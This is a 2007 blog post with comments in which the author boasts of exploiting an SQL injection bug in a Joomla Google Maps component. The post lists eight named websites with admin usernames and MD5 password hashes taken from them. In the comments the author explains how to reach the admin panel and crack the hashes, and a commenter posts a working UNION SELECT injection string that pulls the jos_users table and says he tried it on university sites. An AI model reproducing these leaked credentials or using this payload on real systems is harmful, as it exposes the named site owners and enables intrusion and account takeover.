Joomla

Posted by ghimau under
Hmm.. Supposed aunty virus and I need to meet Dato' K, but he's busy. Ah.. thanks god :)

New sql bug in google maps component? Hihihi
Found a lot of vulnerable site. Got their hash password.

http://www.sportzone.org.nz/
SportZone:7235d5430129327c4bb96062bb5ce6bd

http://www.canineclassicsouth.org/
carolk:26bde2e3315cdd3066a2200e50c69968

http://www.backtohealthphysio.com/
admin:6b59fe8975a7fd2a5baa0381ffe426c9

http://www.rockandrollarmy.com/
admin:23497d01fe41a83ffbef68e3c040a4f2

http://www.basecampone.com/
admin:b76226c510f89744059663b242c9242d

http://www.asianlinkstravel.com/
admin:21232f297a57a5a743894a0e4a801fc3

http://www.islengineering.com/
islengin:033f123b9e92e3d5dcef9b84bebd2189

http://www.surfangoaustralia.com/
sam:ea4cc36b29c9ef8457b0087f8f7d9791

Use it at your own risk. This is just a proof of concept, how sql injection can retrive valuable and sensitive informations.


Hacked by me :)

12 comments:

On 1 August 2007 at 11:44 , viruspadu said...

yahooooooooo...
hari ni dpt rehat sikit
yabedabeduuuuuuuu

 
On 1 August 2007 at 11:48 , ghimau said...

yes yes yes

 
On 1 August 2007 at 17:19 , jay said...

halo, saya dari indonesia. cara masuk admin-nya bagaimana?

bagaimana cara mempergunakan password yang didapat dari joomla sql inject.

trims, please kirim jawaban anda ke cagle_shop@yahoo.com

A.S.A.P
Fajar

 
On 1 August 2007 at 23:00 , Marusheena said...

hey, here rockandrollarmy's webmaster, nice job, thanks for de advise!

 
On 2 August 2007 at 07:56 , ghimau said...

jay : untuk masuk admin gunakan url seperti ini http://www.siteanda.com/administrator

password yang diperolehi adalah dalam bentuk md5 hash. Anda perlu brute force atau crack hash itu terlebih dahulu untuk mendapatkan passwordnya

marusheena : sorry for the disclosure. If there's anything, you can just contact me

 
On 2 August 2007 at 16:47 , alycia said...

woitttt en hakes... dgr2 mlm nie kena kejer ekkk.. ingat, mlm nie mlm jumaat.. jgn peristiwa dulu berulang kembali hik hik...

~ aku yg sekadar menginatkan ~

 
On 2 August 2007 at 20:11 , Marusheena said...

no prob.!

 
On 3 August 2007 at 11:09 , ghimau said...

takper alycia.. malam tadi bukan sorang2.. aunty virus pun ada.. :)

 
On 3 August 2007 at 11:43 , فيصل said...

wow.. aku pun nak cuba la camni.. 2 hari bercuti demam selsema..

 
On 3 August 2007 at 12:24 , فيصل said...

owh..aku baru try kat website dalam utm.. ada gak yang vuln..
tapi macam susah gak die nak crack password tu.. amik masa lama gak la

index.php?option=com_gmaps&task=viewmap&Itemid=57&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*

 
On 6 August 2007 at 09:54 , ghimau said...

cool :)

 
On 7 August 2007 at 10:15 , yan said...

pemerhati PBB